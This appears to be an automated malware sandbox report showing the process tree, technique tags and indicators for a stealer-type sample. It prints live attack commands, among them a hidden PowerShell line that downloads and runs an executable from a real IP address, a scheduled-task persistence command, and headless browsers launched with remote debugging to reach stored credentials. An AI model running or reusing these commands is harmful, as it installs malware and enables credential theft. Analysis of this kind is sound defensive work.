PID 876 wrote to memory of 3408	876	ibC8xs1.exe	119
PID 3104 wrote to memory of 2204	3104	cmd.exe	122
PID 3104 wrote to memory of 2204	3104	cmd.exe	122
PID 4460 wrote to memory of 3624	4460	explorer.exe	124
PID 4460 wrote to memory of 3624	4460	explorer.exe	124
PID 3624 wrote to memory of 3152	3624	exp.exe	127
PID 3624 wrote to memory of 3152	3624	exp.exe	127
PID 3152 wrote to memory of 4308	3152	csc.exe	129
PID 3152 wrote to memory of 4308	3152	csc.exe	129
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130
PID 3624 wrote to memory of 1652	3624	exp.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn iyFj3maCHiI /tr "mshta C:\Users\Admin\AppData\Local\Temp\md8fdXtZY.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2536
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn iyFj3maCHiI /tr "mshta C:\Users\Admin\AppData\Local\Temp\md8fdXtZY.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:512
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\md8fdXtZY.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'THADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1164
  - - C:\Users\Admin\AppData\Local\TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
      "C:\Users\Admin\AppData\Local\TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3900
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2756
      - C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:876
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x2ycjm41\x2ycjm41.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4808
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36F9.tmp" "c:\Users\Admin\AppData\Local\Temp\x2ycjm41\CSCCBDA47E9E8046029837D532D2D59554.TMP"
        8⤵
        
        PID:1628
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:1712
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4352
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Downloads MZ/PE file
        Accesses Microsoft Outlook accounts
        Accesses Microsoft Outlook profiles
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        outlook_office_path
        outlook_win_path
        
        PID:3408
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:1100
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:936
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:1016
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7fff7c20f208,0x7fff7c20f214,0x7fff7c20f220
        9⤵
        
        PID:428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1908,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1884 /prefetch:2
        9⤵
        
        PID:4996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2252,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:3
        9⤵
        
        PID:2836
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2616,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2612 /prefetch:8
        9⤵
        
        PID:4552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3596,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3612,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4260,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3784
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4400,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:4204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3724,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:8
        9⤵
        
        PID:5300
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5300,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:8
        9⤵
        
        PID:5440
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:3808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:6100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff80b9dcf8,0x7fff80b9dd04,0x7fff80b9dd10
        9⤵
        
        PID:6116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2044,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2012 /prefetch:2
        9⤵
        
        PID:5428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2108,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2260 /prefetch:3
        9⤵
        
        PID:5412
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2412,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2408 /prefetch:8
        9⤵
        
        PID:5544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3280,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3276 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5684
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3616,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3612 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4404 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:4744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4688 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5808
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:4708
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:3864
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:2524
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5588
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:508
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:4464
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:4740
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:2196
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Suspicious use of FindShellTrayWindow
        
        PID:5192
      - C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4508
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pceklbkq\pceklbkq.cmdline"
        7⤵
        
        PID:972
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80F3.tmp" "c:\Users\Admin\AppData\Local\Temp\pceklbkq\CSCF991F6BF8FA844F591EB7E1483A3A53A.TMP"
        8⤵
        
        PID:2204
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4944
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:1980
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3048
      - C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2344
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:1924
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:1548
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4552
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4960
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 1416
        8⤵
        Program crash
        
        PID:5400
      - C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2636
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:400
      - C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6004
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Checks SCSI registry key(s)
        
        PID:6036
      - C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5980
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1524
      - C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5124
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5360
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5368
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5312
      - C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:5828
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\chul1at5\chul1at5.cmdline"
        7⤵
        
        PID:5300
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF18F.tmp" "c:\Users\Admin\AppData\Local\Temp\chul1at5\CSC351D5BC91D314C6DBA665BB31AA37275.TMP"
        8⤵
        
        PID:5004
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4408
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5188
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5180
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5236
      - C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1488
